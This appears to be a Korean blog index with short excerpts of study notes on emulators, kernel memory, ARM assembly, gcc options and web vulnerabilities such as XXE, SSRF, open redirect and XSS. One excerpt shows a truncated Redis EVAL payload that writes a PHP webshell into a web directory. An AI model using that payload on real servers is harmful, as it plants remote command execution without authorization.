이 밖에 에뮬레이터로는 모모 앱 플레이어, 녹스, 블루스택이 있음 Quick EMUlator 1. qemu 설치 sudo apt-get install qemu-user-static qemu-system-arm 2. 이미지 / 부트로더 / 커널 커널이 필요하고, 커널을 넣을 이미지 파일이 필요하고, arm system의 경우 바이오스가 없기 때...

virt_to_phys 직접 호출하고 싶다면 kernel mode에서 실행해야 하기 때문에 LKM 등을 사용해야 하며, 어느 아키텍쳐든 최종 인터페이스로 다음 함수를 제공하기 때문에 이를 사용하는 편이 좋다. static inline phys\_addr\_t virt\_to\_phys(volatile void \*address) x86 ( not...

http://recipes.egloos.com/5027277 http://armconverter.com/- 주소 부분이 0xffffff???로 나올 때는 직접 수정해주면 된다. ARM assembly instruction은 기본적인 명령어에 추가적인 옵션을 덧붙여 사용하는 식으로 구성되어 있다. RISK라서 모든 instruction의 크...

webshell upload FLUSHALL eval 'redis.call("set", "<?php eval($\_GET[cmd]); ?>", "test"); redis.call("config", "set", "dir", "/var/www/html/cache/"); redis.call("config", "set", "dbfilename",...

gcc 공유 라이브러리 제작 / 사용 옵션 -fPIC PIC : Position-Independent Code를 생성한다. shared library같은 경우 메모리의 어느 위치에 로딩되는지가 컴파일 타임에 결정되지 않기 때문에 절대주소 대신 상대주소(offset)를 사용하도록 컴파일하는 옵션이다. 즉, 다른 바이너리에서 이 라이브러리의 함수를 호...

open 함수 >>> fd = os.open("./f", os.O\_RDWR) >>> fd 8 >>> fdo = os.fdopen(fd, "wb") >>> fdo <open file '<fdopen>', mode 'wb' at 0x7feb23f57780> >&...

eXternal Entity ATTACK XML에서 동적으로 외부 리소스를 받아오기 위해 external entity를 사용할 때, XML Request를 파싱하는 페이지에서 발생 SSRF를 유도할 수 있다. Port Scan을 수행할 수 있다. Mitigation XML은 보통 불특정 client와 통신하는데 사용되기 때문에 DTD 요소...

Unsafe/Unvalidated/Open Redirect 해당 도메인 이외의 phishing site 등 malicious site로 이동할 수 있다는 건데… 사실 이 자체로 취약점이라고 하긴 좀 그렇긴 함… 하지만 OWASP에서 말하길 trusted site에서 이동하는거라 눈치채지 못하는 유저도 있다. 고 하네 그리고 scheme을...

Server Side Request Forgery 웹 어플리케이션이 외부로 request를 보낼 대상을 설정할 때, 뿐만 아니라 외부로 request를 보낼 수 있는 함수를 사용할 때 인자에 user input이 들어간다면 발생할 수 있다. PHP는http:// Wrapper 를 지원하기 때문에, fopen(), include/require,cUR...

서버에서 받아온 데이터를 그냥 innerHTML로 할당하는 것은 지양해야 한다. XSS https://github.com/naver/lucy-xss-filter 직접 LucyFilter 객체 가져와서 메서드 불러 dirty -> escaped로 만들어야 함. 직접 달아줘야 하기 때문에 달아야 하는 곳에 안달거나, 안달아야 하는 곳...